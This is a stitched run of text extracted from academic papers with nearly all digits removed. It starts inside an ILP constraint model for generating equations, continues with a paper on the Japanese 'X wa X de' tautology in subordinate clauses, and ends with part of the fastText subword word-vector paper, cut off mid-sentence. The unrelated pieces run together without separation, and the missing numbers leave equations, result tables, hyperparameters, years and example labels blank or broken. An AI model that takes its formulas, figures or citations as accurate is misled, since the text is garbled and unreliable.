if op idxi = j, auxiliary vari- ables op xi ,op t i,op o i , and op u i mirror xj, tj,oj, and uj, respectively. se denotes the corresponding constant or operator symbol e (e.g., ‘+’, ‘=’, ‘ ’, etc.) in the postfix expression being constructed. h and w, as before, represent hard and weighted soft constraints. definitional constraints (h) : ci = i(xi ≤ k), i ∈ [l] oi = i(xi > n), i ∈ [l] ci + ui + oi = , i ∈ [l] d = ; di = di− − oi + , ≤ i ≤ l op idx i = max j≤i− {j | dj = di}, ≤ i ≤ l i(op idxi = j) ⇒ i(op x i = xj), i(op t i = tj), i(op oi = oj), i(op u i = uj), i, j ∈ [l] i(xi = j) ⇒ i(ti = typej), i ∈ [l], j ∈ [q] o = ; dl = , postfix validity (h) xl = m; xi < m, ≤ i < l, equation tree structure (h) i(xi = xj) ≤ oi, ≤ i < j < l, single use of constants (h) ci ⇒ i(xi < xj), ≤ i < j < l, perserve text ordering (w)∑ i∈l ui = , single unknown (h) type consistency (w) : i(xi ∈{s+, s−}) ⇒ i(ti = ti− = op ti), i ∈ [l] i(xi = s∗) ⇒ i(ti ∈{ti− , op ti}), i ∈ [l] i(xi = s/) ⇒ i(ti = op t i), i ∈ [l] i(xi ∈{s∗, s/}) ⇒ i(ti− = op ti), i ∈ [l] non-redundancy (h), symmetry breaking (h) : i(xi ∈{s+, s−}) ⇒ i(xi− = s , op xi = s ), i ∈ [l] i(xi = s/ ⇒ i(xi− ∈ {s , s }), i ∈ [l] i(xi ∈{s+, s−}, ci− = ci− = ) ⇒ i(xi− < xi− ), ≤ i ≤ l simplicity (h), equality/unknown first or last (w) : di ≤ maxstackdepth, i ∈ [l] op o l + ol− ,≤ ul− + i(u = ,∀i ∈{ , . . . , l− } : di ≥ ) ≥ equality next to unknown (w) : i(xi = s=) ≤ ui− + op ui , ≤ i ≤ l figure : ilp model for generating candidate equations paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) semantic analysis of the wa tautology in subordinate clauses with minimal independence degree liu yu school of international studies jingdezhen ceramic institute jingdezhen, china e-mail: lredfish_ @ .com zhao junhuai school of foreign language tianjin university of science & technology tianjin, china e-mail: zjh_lx @hotmail.com abstract—japanese boasts a great variety of tautological expressions, by which these tautologies fall into three categories indicated by particles, namely, ハ(pronounced wa), ガ(pronounced ga) and モ(pronounced mo). some of which carry certain unusual semantic features when these tautologies are employed in clauses. this paper aims at analyzing the ハ (pronounced wa) tautology in subordinate clauses with minimal independence degree, and exploring the semantic properties of this category. keywords-tautological expression; dependent clauses; contrastive expression; analogical expression; category i. tautological expressions of ハ class in subordinate clause particle classification is used to classify tautological expressions in this paper, which is to take particle of tautological part as classify standard. tautological expressions of ハ class can be subclassified into four classes: ① ~x は x (だ) ② x は x (で)、y は y (だ) ③ x は x でも~ ④ x は x で~ this paper focuses on type ④ whose language form can be expressed as x は x で~[ ]. for this form, the first question is which part of its tautological expression belongs to. type ④ is similar to type ②, because the first half of type ② is also the form. but these two types are completely different. the following two examples can explain their differences from three aspects. ( ) 昔は昔、今は今。 ( ) 冬は冬で日本海側は汽車が豪雪で立ち往生し ているのに、太平洋側は空風が吹きまくる。 first, we can see that “で” of type ② is often omitted in daily dialogue. even if it is not omitted, we can know that X and X refer to the same noun. the superscript is the sequence of the noun in a sentence. 
if the number is unnecessary, x is used to represent the noun of the tautology part in this paper. “で” is middleton form of auxiliary verb “だ”, that is, it is an auxiliary verb. in example ( ) which represents type ④, there is usually no dayton after “ で ”. seeing from the sentence meaning, it is difficult to say that this “で” is an auxiliary verb and it should be taken as a case-particle. second, seeing from the sentence structure, the front part and the back part of type ② is called “等位節” or “並列節”, which is tied clause. however, in type ④, tautological part is obviously not tied clause or main clause, so it is a clause sentence. third, from the overall translation of the sentence, they are different. tautological expression will appear when type ② is translated into chinese or english, while type ④ will not. ( a)以前(过去)是以前(过去), 现在是现在。 ( b)the past is the past, today is today. ( a)冬天日本海那边火车因大雪而无法开动,太平洋 岸却猛刮干风。 ( b)when it comes to winter, trains get stuck in heavy snows along the coast of the japan sea when strong winds blow beside the pacific ocean. from the underlining parts of chinese and english translation of type ( ), it can be seen that type ② can be translated into tautological expression without any problems, while type ④ cannot. japanese clauses classification of minami( ) has been improved, this paper uses the classification of noda ( ). 従属句(独立度が一番低い)「~ながら」「~まま」 (付帯状況句)、「~て」(継起句)など 強い従属節(独立度が低い)「~と」「~たら」「~ ば」「~ても」時間節、連体修飾節など 弱い従属節(独立度が高い)「~から」「~のに」 「~し」「~けれど」「~が」など 引用節(独立度が一番高い)「~と」「~って」など it can be seen from the above classification, tautological part of type ④ only belongs to subordinate clause (従属句) which has the lowest degree of independence. “従属句” has no definite chinese translation. according to japanese linguistics, in a sentence, parts with “ながら” are called “従 mailto:redfish_ @ .com international conference on sensor network and computer engineering (icsnce ) 属 節 ” which is clause. in linguistics, there are two translations for “句” of japanese, which are “phrase” and “clause”. japanese grammar often uses it as the translation of the latter one, but “clause” also means “从句”. so this is a problem of unequal concept caused by the differences of languages. considering that there is less unit than phrase or clause in chinese, this paper takes“小句”as the translation of “従属句” (“词组” is also possible, but it is too unnatural). however, it should be noted that according to noda( ), in subordinate clause, neither “は” nor “が” can be used. from this point of view, only “x で” in type ④ can be called subordinate clause, so the later part of tautological express of type ④ is in subordinate clause, which is different from type ③. in type ③, the whole tautological expression is in subordinate clause. although there is half in subordinate clause, type ④ can be called “tautological expression in subordinate clause”. ii. first research of type ④ like type ③, the first research of type ④ is less. at first, it was carried out as a custom sentence by chen shengbao ( ) in advanced japanese for grade three of china. example ( ) in this paper is from this book. chen shengbao ( ) explains type ④ as 「冬は冬で」のように「名詞+は+同じ名詞+ で」という表現は、「冬は冬にふさわしい事情があ る」とか、「冬は冬の問題点を持っている」などの意 を表す。そして用言の場合だと、「続けば続いたで」 のように、「仮定表現+過去表現+で」というふうに 使われる。 in fact, type ④ is a more difficult to understand for japanese learners from china, because it is a meaningless repetition literally in the sentence as a whole for japanese learners from china. chen shengbao ( ) only superficially interprets example ( ). 
whether it is for the understanding of japanese learners or for the fundamental meaning of the meaning characteristics of type ④, it is not very inadequate. on the basis of reference of chen shengbao ( ), the author summarizes for japanese learners on type ④. XはXなりの事情・ 状況・ 方法・ 特性などがあ る。「はX で」という部分を「も」に換えても意味 はそれほど変わらない。 it was very important that “it can be replaced with particle “も”. it is useful for japanese learners to understand type ④, and it also reflects that type ④ has the nature of contrastive sentence. the nature of being similar to contrastive sentence is proved in グループ・ ジャマシイ ( ). according to グループ・ ジャマシイ( ): “「X はXで」と同じ名詞を繰り返し用いて、他のものと対 比しながらXについて述べるのに用いる。”by careful observation, it can be found that type ② (x は x (で) and y は y (だ)) is very similar to contrastive sentence in language form. but in the later discussion, it can be seen that they are not contrastive sentences. they should be called analogical sentences. the following example ( ) is a more complete example in language form. ( ) 夏は夏で溶けそうだ。冬は冬で眠い。 in this example, “summer” and “winter” are a pair of antonyms. the sentence is like a comparison between summer and winter. okamoto ( )( ) also gives some examples which are similar to example ( ), which takes type ④ as the sentence with the structure of the expression of contrast. ( ) 私があれほど憧れ、狙っている一流会社の一 流男。昼間は昼間で社内の女どものものすごい争奪戦 があり、夜は夜でホステスが鵜の目鷹の目。 ( ) 平日はもういつでもものすごく混んでるし、 ウィークエンドはウィークエンドでまたすごいの。 ( ) 男の子は、なんてたって末が楽しみですよ。 頼もしいものですよ。でも、娘は娘で可愛いものです ね。両方あるのが一番ですよ。 (the sentences of the three examples were written originally in roman letters and were translated into japanese for the convenience in this paper.) iii. the semantic properties of type ④ from the underlining parts of the above examples, it can be seen that there are a pair of antonyms or a pair of words which is similar to antonyms. this can be said to be a prerequisite or condition, only with this premise or condition, type ④ can be used. examples from グループ・ ジャマシ イ( ) all have this feature. ( ) 彼の言うことなど気にせず、君は君で自分が 正しいと思ったことをやればいいのだ。 ( ) 姉はオリンピックで金メダルを取り、妹は妹 で、初めて書いた小説が芥川賞を受賞した。 ( ) タヌキは若い女に化け、キツネはキツネで立 派な侍に変わった。 it seems that type ④ can be said to be an extension of type ②. in order to better highlight this association, example ( ) can be modified. ( a)夏は夏で、冬は冬だ。 ( b)夏は溶けそうだ。冬は眠い。 as shown in ( a), if the narrative part of the latter half is removed, example ( ) will immediately become type ②. and ( b) shows a similarity to type ③, that is, delete one of x, the sentence meaning roughly unchanged. this indicates that if tautological parts of tautology of ハ class of japanese is not the same part of the main clause, one x can be deleted to make japanese learners better understand its characteristics. x is only different from type ③. type ③ international conference on sensor network and computer engineering (icsnce ) achieves this effect by removing x , and type ④, by removing x . in addition, type ④ has an important feature that the parts of two pairs of terms x and y do not have to be symmetrical like example ( ), which is proved by examples ( )-( ). x and y even do not have to appear together. for example, ( ) (新しく開発されたソースをかけた料理につい て) 「おいしいんだろうけど、ソースはソースで食べ たい。」 but even if one of x or y does not appear, it does not mean there is no x or y. it is potential in another form. for example, x is “料理自体” in example ( ). in other words, it can be concluded that there must be a pair of things in type ④. 
according to the example of okamoto( ), compare it with the original sentence after deleting x , the argument can be proved. ( ) 野菜は野菜でここに置いて下さい。 ( a)野菜はここに置いて下さい。 ( a) is purely the expression of the meaning of the vegetables are here. the sentence is not about the following meanings, is there other things besides vegetables which will be put here? should the things be put here or there? ( ) is different. it has the following two meanings, such as “野菜 は野菜、野菜だけのグループにする” and”その野菜だ けのグループをここに置く”. in other words, ( ) is to have the meaning of the distinction or classification of things, which means ( ) must contain “ ほかの食材もある ”. therefore, in ( ), vegetables and other ingredients are indispensable. the follows are the most important feature of type ④, which is also the key basis that determines that it is not contractive sentence. back to the previous summary of a key feature of type ②, things represented by x and y of type ② must have one thing in common to make this pair of things belong to the same category at a deeper level. from this critical summary and the similarity of type ② and type ④, it is reasonable to deduce that type also has this characteristic. the key is how to demonstrate it. after example ( ), okamoto( ) changed the sentence into: ( ) *平日はもういつもものすごく混んでるけど、 ウィークエンドはウィークエンドでわりあいすいてい る。 okamoto ( ) makes this example a complete mistake by changing the narrative part of the “またすごいの” at the end of the sentence into “わりあいすいている”, which is the asterisk in front of the sentence means the sentence is completely wrong. similar to the opposite meaning of the narrative. okamoto ( ) regards the things represented by x and y of type ④ as two contrastive frames, treating the narrative part of the situation as a consequence, from example ( ) and ( ), it is deduced that the two frames of x and y will bring the same consequence, and if not, “x は x で” is not applicable. this common point is not that x and y have on literal meaning, it is the second half of the narrative part of the statement expressed. in addition to the above examples, there are more examples to support this. ( ) 輝己がときどき加わる夕飯の時間も、朋子に は楽しみだった。葡萄酒のことなら任せてくれ、とい う輝己の講釈を聞きながら、葡萄酒を飲み、食後は食 後で、輝己がアルコール分を炎にして抜いてくれたブ ランデーを嘗めた。(津島佑子 ) ( ) (権叔父に批判されて)本位田又八「やめたやめ たっ。やってられっかっ。俺は俺でやっていく!!おふ くろたちと一緒じゃいつまでたっても俺は又八のまま だ。俺は小次郎!佐々木小次郎だっ!!」(井上雄彦( ) 『バガボンド 』講談社) ( ) (トイレ中にアラレちゃんに吹っ飛ばされてた いへんに目にあった)則巻センベイ博士「ボクちゃん あんなハジかいたのうまれてはじめてだいっ!!こ、 このまえはこのまえで地球をわってしまうし!!」 (鳥山明( )『dr.スランプ 』集英社文庫 p ) all of the examples listed above in this paper clearly show the common points between x and y in the narrative of the second half. ( )( )夏と冬、両方とも人間に望ましくない状況。 ( )昼間と夜、両方とも女の激しい競争対象になっ ている。 ( )平日とウィークエンド、両方とも混雑している 状況。 ( )むすことむすめ、両方とも親にとって望ましい 側面を持つ。 ( )彼と君、両方とも自分が正しいと思っている意 見がある。 ( )姉と妹、両方ともある程度の成功を収めてい る。 ( )タヌキとキツネ、両方とも立派に人間の姿に化 けることができる。 ( )料理自体と料理に使うソース、両方ともおいし い。 ( )野菜とほかの食材、両方とも食材。 ( )食事中と食後、両方ともお酒を飲んだ。 ( )佐々木小次郎を装った又八と宮本武蔵、両方と も剣道修行を進んでいる。 ( )今回とこのまえ、両方ともアラレちゃんがひど いことをした。 international conference on sensor network and computer engineering (icsnce ) it can be seen, the things represented by x and y must have a common point which is also the necessary conditions of using type ④. however, okamoto ( ) used the term “contrast” for x and y, which is considered to be very inappropriate and needs to be specified. the concept of contrast (“対比表現”) is mentioned in many studies, however, there is not a clear definition. many times it is roughly used in the following examples. 
( )野菜は好きだけど、肉は嫌いだ。 ( )北海道?夏だったら行きたいけど、冬は行きた くないね。 to analyze the contrastive sentence and tautological part of type ④, the clauses where x and y are must be divided into subject and narrative department. contrastive sentence and tautology of type ④ have the same place that x and y are opposite or relative. the key difference between type and contrastive sentence is the narrative part. like ( ) and ( ) which are contrastive sentences, linguistic meaning of the narrative part is opposite or relative. while the narrative of type ④ is similar, which is evident from the comparison of examples ( ) and ( ). comparison can be done of example ( ) and ( ). the narrative part of the former “お いしい”and “食べたい” can be seen to have the same meaning. if someone thinks something is delicious, it means he wants to eat it. it is not the same although there is both the meaning of “going” of the narrative parts in ( ). “going” is the meaning of the fragment, not the overall significance of narrative parts. therefore, type ④ is fundamentally different with the general contractive sentence. it is not appropriate to call it contrastive sentence. perhaps it can be called analogical sentence. analogy which is carried out by the narrative part makes type ④ have another important feature which is different from type ②. tautology of type ② is a kind of stress sentence. since the main analogical meaning parts are in narrative part, tautology of subject part of type ④ has no stress role. in other words, tautological expression of type ④ disappears. it only plays a sub-category of the subject matter of the sub-category role and the function completely disappears. finally, there is an extremely important intermediate transitional example that fully shows the relevance of type ④ and type ②. ( )ワムウ「なっ!なんの真似だ!?」 ジョジョ「おまえの首から出ている煙は爆発の煙 ではない!……それは「波紋傷」の煙だ!先に胸や脚 にくらった「波紋」はすでに全身に回っていたようだ な。おめーらにとって波紋がどんなに苦しいかはよく 知っている。もうなおすことはできねえが、 おれ の血でせめて痛みを和らげて死にな!」 ジョジョ「「まさかjojo ジョジョ きさま」と驚く」 ワムウ「まさかッ!jojo ジョジョ !きさま!」 ジョジョ「そうさ!ワムウ!戦いは戦いで別、シ ーザーの死の悲しみは悲しみで別……おれもなぜかあ んたに対して敬意をはらいたくなったのさ……この血 はあんたへの「敬意」なんだ……」(荒木飛呂彦( ) 『ジョジョの奇妙な冒険 』集英社文庫 p ) this example is almost identical in language to type ②. since there are other language components in tautological part, it belongs to type ④ from the perspective of sentence structure. it can be said that it is the intermediate transitional example of connection between the two types, which is relatively rare. iv. conclusion this paper makes a general analysis and summary of the characteristics to tautology (type ③), where tautological part is in clause. several key points can be summarized as follows. ) tautological part appears in subordinate clauses with minimal independence degree. only “x で ” is the subordinate clause. ) tautological part will not appear when translating into chinese or english. ) it is similar to the semantic properties of type ② characteristics in some parts. there are a group of things in pairs in the whole context, representing the subject of the type. the subject matter of things can be symmetrical or asymmetric in the form of language, one of which sometimes does not appear literally. ) being significantly different from type ②, its subject which is the tautological part does no longer have the tone of emphasis, but is functional as the auxiliary role of a sub-category of the subject matter. references [ ] グループ・ジャマシイ( )『教師と学習者のための日本語文 型辞典』くろしお出版 [ ] 野田尚史( )『「は」と「が」』くろしお出版 [ ] 南不二男( )『現代日本語の構造』大修館書店 [ ] chen shengbao, hu guowei, chen huahao ( ). 
japanese ( th volume of high school professional textbook of university of japanese). shanghai foreign language education press. [ ] zhai dongna, lin hong, pan jun. japanese linguistics. , higher education press. [ ] okamoto, shigeko, . nominal ‘tautologies’ in japanese: x wa x, x ga x, x mo x. proceedings of the th annual meeting of the berkeley linguistics society, - [ ] okamoto, shigeko, . nominal repetitive constructions in japanese: the ‘tautology’ controversy revisited. journal of pragmatics : - enriching word vectors with subword information piotr bojanowski∗ and edouard grave∗ and armand joulin and tomas mikolov facebook ai research {bojanowski,egrave,ajoulin,tmikolov}@fb.com abstract continuous word representations, trained on large unlabeled corpora are useful for many natural language processing tasks. popular models that learn such representations ignore the morphology of words, by assigning a dis- tinct vector to each word. this is a limitation, especially for languages with large vocabular- ies and many rare words. in this paper, we pro- pose a new approach based on the skipgram model, where each word is represented as a bag of character n-grams. a vector represen- tation is associated to each character n-gram; words being represented as the sum of these representations. our method is fast, allow- ing to train models on large corpora quickly and allows us to compute word representations for words that did not appear in the training data. we evaluate our word representations on nine different languages, both on word sim- ilarity and analogy tasks. by comparing to recently proposed morphological word repre- sentations, we show that our vectors achieve state-of-the-art performance on these tasks. introduction learning continuous representations of words has a long history in natural language processing (rumel- hart et al., ). these representations are typ- ically derived from large unlabeled corpora using co-occurrence statistics (deerwester et al., ; schütze, ; lund and burgess, ). a large body of work, known as distributional semantics, has studied the properties of these methods (turney ∗the two first authors contributed equally. et al., ; baroni and lenci, ). in the neural network community, collobert and weston ( ) proposed to learn word embeddings using a feed- forward neural network, by predicting a word based on the two words on the left and two words on the right. more recently, mikolov et al. ( b) pro- posed simple log-bilinear models to learn continu- ous representations of words on very large corpora efficiently. most of these techniques represent each word of the vocabulary by a distinct vector, without param- eter sharing. in particular, they ignore the internal structure of words, which is an important limitation for morphologically rich languages, such as turk- ish or finnish. for example, in french or spanish, most verbs have more than forty different inflected forms, while the finnish language has fifteen cases for nouns. these languages contain many word forms that occur rarely (or not at all) in the training corpus, making it difficult to learn good word rep- resentations. because many word formations follow rules, it is possible to improve vector representations for morphologically rich languages by using charac- ter level information. in this paper, we propose to learn representations for character n-grams, and to represent words as the sum of the n-gram vectors. 
our main contribution is to introduce an extension of the continuous skip- gram model (mikolov et al., b), which takes into account subword information. we evaluate this model on nine languages exhibiting different mor- phologies, showing the benefit of our approach. transactions of the association for computational linguistics, vol. , pp. – , . action editor: hinrich schütze. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. related work morphological word representations. in recent years, many methods have been proposed to incor- porate morphological information into word repre- sentations. to model rare words better, alexan- drescu and kirchhoff ( ) introduced factored neural language models, where words are repre- sented as sets of features. these features might in- clude morphological information, and this technique was succesfully applied to morphologically rich lan- guages, such as turkish (sak et al., ). re- cently, several works have proposed different com- position functions to derive representations of words from morphemes (lazaridou et al., ; luong et al., ; botha and blunsom, ; qiu et al., ). these different approaches rely on a morphological decomposition of words, while ours does not. similarly, chen et al. ( ) introduced a method to jointly learn embeddings for chinese words and characters. cui et al. ( ) proposed to constrain morphologically similar words to have similar representations. soricut and och ( ) described a method to learn vector representations of morphological transformations, allowing to ob- tain representations for unseen words by applying these rules. word representations trained on mor- phologically annotated data were introduced by cot- terell and schütze ( ). closest to our approach, schütze ( ) learned representations of character four-grams through singular value decomposition, and derived representations for words by summing the four-grams representations. very recently, wi- eting et al. ( ) also proposed to represent words using character n-gram count vectors. however, the objective function used to learn these representa- tions is based on paraphrase pairs, while our model can be trained on any text corpus. character level features for nlp. another area of research closely related to our work are character- level models for natural language processing. these models discard the segmentation into words and aim at learning language representations directly from characters. a first class of such models are recur- rent neural networks, applied to language model- ing (mikolov et al., ; sutskever et al., ; graves, ; bojanowski et al., ), text nor- malization (chrupała, ), part-of-speech tag- ging (ling et al., ) and parsing (ballesteros et al., ). another family of models are convolu- tional neural networks trained on characters, which were applied to part-of-speech tagging (dos san- tos and zadrozny, ), sentiment analysis (dos santos and gatti, ), text classification (zhang et al., ) and language modeling (kim et al., ). sperr et al. ( ) introduced a language model based on restricted boltzmann machines, in which words are encoded as a set of character n- grams. finally, recent works in machine translation have proposed using subword units to obtain repre- sentations of rare words (sennrich et al., ; lu- ong and manning, ). model in this section, we propose our model to learn word representations while taking into account morphol- ogy. 
we model morphology by considering subword units, and representing words by a sum of its charac- ter n-grams. we will begin by presenting the general framework that we use to train word vectors, then present our subword model and eventually describe how we handle the dictionary of character n-grams. . general model we start by briefly reviewing the continuous skip- gram model introduced by mikolov et al. ( b), from which our model is derived. given a word vo- cabulary of size w , where a word is identified by its index w ∈ { , ...,w}, the goal is to learn a vectorial representation for each word w. inspired by the distributional hypothesis (harris, ), word representations are trained to predict well words that appear in its context. more formally, given a large training corpus represented as a sequence of words w , ...,wt , the objective of the skipgram model is to maximize the following log-likelihood: t∑ t= ∑ c∈ct log p(wc | wt), where the context ct is the set of indices of words surrounding word wt. the probability of observing a context word wc given wt will be parameterized using the aforementioned word vectors. for now, let us consider that we are given a scoring function s which maps pairs of (word, context) to scores in r. one possible choice to define the probability of a context word is the softmax: p(wc | wt) = es(wt, wc) ∑w j= e s(wt, j) . however, such a model is not adapted to our case as it implies that, given a word wt, we only predict one context word wc. the problem of predicting context words can in- stead be framed as a set of independent binary clas- sification tasks. then the goal is to independently predict the presence (or absence) of context words. for the word at position t we consider all context words as positive examples and sample negatives at random from the dictionary. for a chosen context position c, using the binary logistic loss, we obtain the following negative log-likelihood: log ( + e−s(wt, wc) ) + ∑ n∈nt,c log ( + es(wt, n) ) , where nt,c is a set of negative examples sampled from the vocabulary. by denoting the logistic loss function ` : x → log( + e−x), we can re-write the objective as: t∑ t=   ∑ c∈ct `(s(wt, wc)) + ∑ n∈nt,c `(−s(wt, n))   . a natural parameterization for the scoring function s between a word wt and a context word wc is to use word vectors. let us define for each word w in the vocabulary two vectors uw and vw in rd. these two vectors are sometimes referred to as input and out- put vectors in the literature. in particular, we have vectors uwt and vwc , corresponding, respectively, to words wt and wc. then the score can be computed as the scalar product between word and context vec- tors as s(wt,wc) = u>wtvwc . the model described in this section is the skipgram model with negative sampling, introduced by mikolov et al. ( b). . subword model by using a distinct vector representation for each word, the skipgram model ignores the internal struc- ture of words. in this section, we propose a different scoring function s, in order to take into account this information. each word w is represented as a bag of character n-gram. we add special boundary symbols < and > at the beginning and end of words, allowing to dis- tinguish prefixes and suffixes from other character sequences. we also include the word w itself in the set of its n-grams, to learn a representation for each word (in addition to character n-grams). 
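To keep the notation of the general model at hand while reading the subword example that follows, the skipgram-with-negative-sampling formulation described above can be summarized compactly; this is a restatement of the standard formulation of Mikolov et al., written with the symbols already introduced in the text.

```latex
% Skipgram log-likelihood over a corpus w_1,\dots,w_T with context sets C_t
\sum_{t=1}^{T} \sum_{c \in \mathcal{C}_t} \log p(w_c \mid w_t)

% Softmax parameterization of the context probability via a scoring function s
p(w_c \mid w_t) \;=\; \frac{e^{\,s(w_t,\,w_c)}}{\sum_{j=1}^{W} e^{\,s(w_t,\,j)}}

% Negative-sampling objective to minimize, with logistic loss \ell(x) = \log(1 + e^{-x})
% and N_{t,c} a set of negative words sampled from the vocabulary
\sum_{t=1}^{T} \Biggl[\; \sum_{c \in \mathcal{C}_t} \ell\bigl(s(w_t, w_c)\bigr)
      \;+\; \sum_{n \in \mathcal{N}_{t,c}} \ell\bigl(-s(w_t, n)\bigr) \Biggr]

% Plain skipgram score: inner product of input and output word vectors
s(w_t, w_c) \;=\; \mathbf{u}_{w_t}^{\top} \mathbf{v}_{w_c}
```

The subword model introduced below modifies only the scoring function s; the objective itself is left unchanged.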
taking the word where and n = as an example, it will be represented by the character n-grams: <wh, whe, her, ere, re> and the special sequence <where>. note that the sequence <her>, corresponding to the word her is different from the tri-gram her from the word where. in practice, we extract all the n-grams for n greater or equal to and smaller or equal to . this is a very simple approach, and different sets of n-grams could be considered, for example taking all prefixes and suffixes. suppose that you are given a dictionary of n- grams of size g. given a word w, let us denote by gw ⊂ { , . . . ,g} the set of n-grams appearing in w. we associate a vector representation zg to each n-gram g. we represent a word by the sum of the vector representations of its n-grams. we thus ob- tain the scoring function: s(w,c) = ∑ g∈gw z>g vc. this simple model allows sharing the representa- tions across words, thus allowing to learn reliable representation for rare words. in order to bound the memory requirements of our model, we use a hashing function that maps n-grams to integers in to k. we hash character sequences using the fowler-noll-vo hashing function (specifi- cally the fnv- a variant). we set k = . be- low. ultimately, a word is represented by its index in the word dictionary and the set of hashed n-grams it contains. experimental setup . baseline in most experiments (except in sec. . ), we compare our model to the c implementation http://www.isthe.com/chongo/tech/comp/fnv of the skipgram and cbow models from the word vec package. . optimization we solve our optimization problem by perform- ing stochastic gradient descent on the negative log likelihood presented before. as in the baseline skipgram model, we use a linear decay of the step size. given a training set containing t words and a number of passes over the data equal to p , the step size at time t is equal to γ ( − ttp ), where γ is a fixed parameter. we carry out the optimiza- tion in parallel, by resorting to hogwild (recht et al., ). all threads share parameters and update vectors in an asynchronous manner. . implementation details for both our model and the baseline experiments, we use the following parameters: the word vectors have dimension . for each positive example, we sam- ple negatives at random, with probability propor- tional to the square root of the uni-gram frequency. we use a context window of size c, and uniformly sample the size c between and . in order to sub- sample the most frequent words, we use a rejection threshold of − (for more details, see (mikolov et al., b)). when building the word dictionary, we keep the words that appear at least times in the training set. the step size γ is set to . for the skipgram baseline and to . for both our model and the cbow baseline. these are the default values in the word vec package and work well for our model too. using this setting on english data, our model with character n-grams is approximately . × slower to train than the skipgram baseline. indeed, we process k words/second/thread versus k words/second/thread for the baseline. our model is implemented in c++, and is publicly available. . datasets except for the comparison to previous work (sec. . ), we train our models on wikipedia data. we downloaded wikipedia dumps in nine languages: arabic, czech, german, english, https://code.google.com/archive/p/word vec https://github.com/facebookresearch/fasttext https://dumps.wikimedia.org spanish, french, italian, romanian and russian. 
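As a concrete illustration of the subword machinery described above (boundary symbols, extraction of character n-grams of bounded length, inclusion of the word itself as a special sequence, and FNV-1a hashing of n-grams into a fixed number of buckets), a minimal sketch might look as follows. The bucket count, the n-gram length range, and the function names are illustrative defaults chosen for the sketch, not a transcription of the released C++ implementation.

```python
def fnv1a_32(s):
    """32-bit FNV-1a hash of a UTF-8 string."""
    h = 2166136261
    for byte in s.encode("utf-8"):
        h ^= byte
        h = (h * 16777619) & 0xFFFFFFFF
    return h

def char_ngrams(word, n_min=3, n_max=6):
    """Character n-grams of a word wrapped in boundary symbols,
    plus the full word itself as an additional special sequence."""
    wrapped = "<" + word + ">"
    grams = [wrapped[i:i + n]
             for n in range(n_min, n_max + 1)
             for i in range(len(wrapped) - n + 1)]
    grams.append(wrapped)          # e.g. "<where>" for the word "where"
    return grams

def ngram_buckets(word, num_buckets=2_000_000):
    """Map each n-gram to an integer bucket via FNV-1a hashing
    (bucket count here is an illustrative choice)."""
    return [fnv1a_32(g) % num_buckets for g in char_ngrams(word)]

# For n = 3 only, "where" yields <wh, whe, her, ere, re> and the sequence <where>:
print(char_ngrams("where", 3, 3))
```

With this in place, the score of a (word, context) pair is obtained by summing the bucket vectors of the word's n-grams and taking the inner product with the context vector, exactly as in the scoring function defined above.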
we normalize the raw wikipedia data using matt mahoney’s pre-processing perl script. all the datasets are shuffled, and we train our models by doing five passes over them. results we evaluate our model in five experiments: an eval- uation of word similarity and word analogies, a com- parison to state-of-the-art methods, an analysis of the effect of the size of training data and of the size of character n-grams that we consider. we will de- scribe these experiments in detail in the following sections. . human similarity judgement we first evaluate the quality of our representations on the task of word similarity / relatedness. we do so by computing spearman’s rank correlation co- efficient (spearman, ) between human judge- ment and the cosine similarity between the vector representations. for german, we compare the dif- ferent models on three datasets: gur , gur and zg (gurevych, ; zesch and gurevych, ). for english, we use the ws dataset in- troduced by finkelstein et al. ( ) and the rare word dataset (rw), introduced by luong et al. ( ). we evaluate the french word vectors on the translated dataset rg (joubarne and inkpen, ). spanish, arabic and romanian word vectors are evaluated using the datasets described in (hassan and mihalcea, ). russian word vectors are eval- uated using the hj dataset introduced by panchenko et al. ( ). we report results for our method and baselines for all datasets in table . some words from these datasets do not appear in our training data, and thus, we cannot obtain word representation for these words using the cbow and skipgram baselines. in order to provide comparable results, we propose by default to use null vectors for these words. since our model exploits subword information, we can also compute valid representations for out-of-vocabulary words. we do so by taking the sum of its n-gram vectors. when oov words are represented using http://mattmahoney.net/dc/textdata sg cbow sisg- sisg ar ws de gur gur zg en rw ws es ws fr rg ro ws ru hj table : correlation between human judgement and similarity scores on word similarity datasets. we train both our model and the word vec baseline on normalized wikipedia dumps. evaluation datasets contain words that are not part of the training set, so we represent them using null vectors (sisg-). with our model, we also compute vectors for unseen words by summing the n-gram vectors (sisg). null vectors we refer to our method as sisg- and sisg otherwise (subword information skip gram). first, by looking at table , we notice that the pro- posed model (sisg), which uses subword informa- tion, outperforms the baselines on all datasets except the english ws dataset. moreover, computing vectors for out-of-vocabulary words (sisg) is al- ways at least as good as not doing so (sisg-). this proves the advantage of using subword information in the form of character n-grams. second, we observe that the effect of using char- acter n-grams is more important for arabic, ger- man and russian than for english, french or span- ish. german and russian exhibit grammatical de- clensions with four cases for german and six for russian. also, many german words are compound words; for instance the nominal phrase “table ten- nis” is written in a single word as “tischtennis”. by exploiting the character-level similarities between “tischtennis” and “tennis”, our model does not rep- resent the two words as completely different words. 
finally, we observe that on the english rare words dataset (rw), our approach outperforms the sg cbow sisg cs semantic . . . syntactic . . . de semantic . . . syntactic . . . en semantic . . . syntactic . . . it semantic . . . syntactic . . . table : accuracy of our model and baselines on word analogy tasks for czech, german, english and italian. we report results for semantic and syntactic analogies separately. baselines while it does not on the english ws dataset. this is due to the fact that words in the en- glish ws dataset are common words for which good vectors can be obtained without exploiting subword information. when evaluating on less fre- quent words, we see that using similarities at the character level between words can help learning good word vectors. . word analogy tasks we now evaluate our approach on word analogy questions, of the form a is to b as c is to d, where d must be predicted by the models. we use the datasets introduced by mikolov et al. ( a) for english, by svoboda and brychcin ( ) for czech, by köper et al. ( ) for german and by berardi et al. ( ) for italian. some questions con- tain words that do not appear in our training corpus, and we thus excluded these questions from the eval- uation. we report accuracy for the different models in table . we observe that morphological informa- tion significantly improves the syntactic tasks; our approach outperforms the baselines. in contrast, it does not help for semantic questions, and even degrades the performance for german and italian. note that this is tightly related to the choice of the length of character n-grams that we consider. we show in sec. . that when the size of the n-grams is chosen optimally, the semantic analogies degrade de en es fr gur zg ws rw ws rg luong et al. ( ) - - - - qiu et al. ( ) - - - - soricut and och ( ) sisg botha and blunsom ( ) sisg table : spearman’s rank correlation coefficient between human judgement and model scores for different methods using morphology to learn word representations. we keep all the word pairs of the evaluation set and obtain representations for out-of-vocabulary words with our model by summing the vectors of character n-grams. our model was trained on the same datasets as the methods we are comparing to (hence the two lines of results for our approach). less. another interesting observation is that, as ex- pected, the improvement over the 